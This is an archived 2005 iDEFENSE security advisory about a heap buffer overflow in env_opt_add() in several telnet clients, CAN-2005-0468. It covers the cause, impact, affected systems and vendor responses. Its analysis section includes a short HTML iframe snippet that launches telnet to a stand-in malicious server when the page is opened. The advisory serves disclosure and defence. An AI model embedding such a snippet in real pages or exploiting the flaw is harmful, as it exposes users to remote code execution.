Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:8174
HistoryMar 31, 2005 - 12:00 a.m.

iDEFENSE Security Advisory 03.28.05: Multiple Telnet Client env_opt_add() Buffer Overflow Vulnerability

2005-03-3100:00:00
vulners.com
34

Multiple Telnet Client env_opt_add() Buffer Overflow Vulnerability

iDEFENSE Security Advisory 03.28.05
www.idefense.com/application/poi/display?id=221&type=vulnerabilities
March 28, 2005

I. BACKGROUND

The TELNET protocol allows virtual network terminals to be connected to
over the internet. The initial description of the telnet protocol was
given in RFC854 in May 1983. Since then there have been many extra
features added including encryption.

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in multiple
telnet clients could allow the execution of arbitrary code.

The vulnerability specifically exists in the env_opt_add() function of
telnet.c. A buffer of a fixed size (256 bytes) is allocated to store the
result of the processing this function performs on network input. If
this buffer is not large enough to contain the string, the buffer is
expanded by a further 256 bytes. This size is sufficient for most well
formed input, as the buffer passed as input to the affected function is
limited to the same size. However, due to the way the telnet protocol
escapes certain characters, it is possible to increase the length of the
output by including a large run of characters which need escaping. This
can allow the 256 byte input buffer to expand to a maximum of 512 bytes
in the allocated storage buffer. If, after expanding the buffer by 256
bytes, the buffer is still not large enough to contain the input, a heap
based buffer overflow occurs, which is exploitable on at least some
affected platforms.

III. ANALYSIS

Successful exploitation of this vulnerability could allow an attacker to
execute arbitrary commands in the context of the user who launched the
telnet client.

In order to exploit this vulnerability, an attacker would need to
convince the user to connect to their malicious server. It may be
possible to automatically launch the telnet command from a webpage, for
example:

<html><body>
<iframe src='telnet://malicious.server/'>
</body>

On opening this page the telnet client may be launched and attempt to
connect to the host 'malicious.server'.

IV. DETECTION

iDEFENSE has confirmed the existance of the vulnerability in the telnet
client included in the Kerberos V5 Release 1.3.6 package and the client
included in the SUNWtnetc package of Solaris 5.9. It is suspected that
most BSD based telnet clients are affected by this vulnerability.

V. WORKAROUND

iDEFENSE is currently unaware of any effective workarounds for this
vulnerability.

VI. VENDOR RESPONSE

The following vendors have provided official responses related to this
vulnerability. Other vendors may be affected but have not provided an
official response.

Vulnerable:

Not Vulnerable:

  • CyberSafe Limited
    The CyberSafe TrustBroker products, version 3.0 or later, are not
    vulnerable.

  • Hewlett-Packard Development Company, L.P.
    HP-UX and HP Tru64 UNIX are not vulnerable.

  • InterSoft International, Inc.
    InterSoft International, Inc. products NetTerm, SecureNetTerm and
    SNetTerm are not affected by the env_opt_add() buffer overflow
    conditions.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-0468 to this issue. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

02/18/2005 Initial vendor notifications
03/28/2005 Coordinated public disclosure

IX. CREDIT

Gaël Delalleau credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [email protected] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.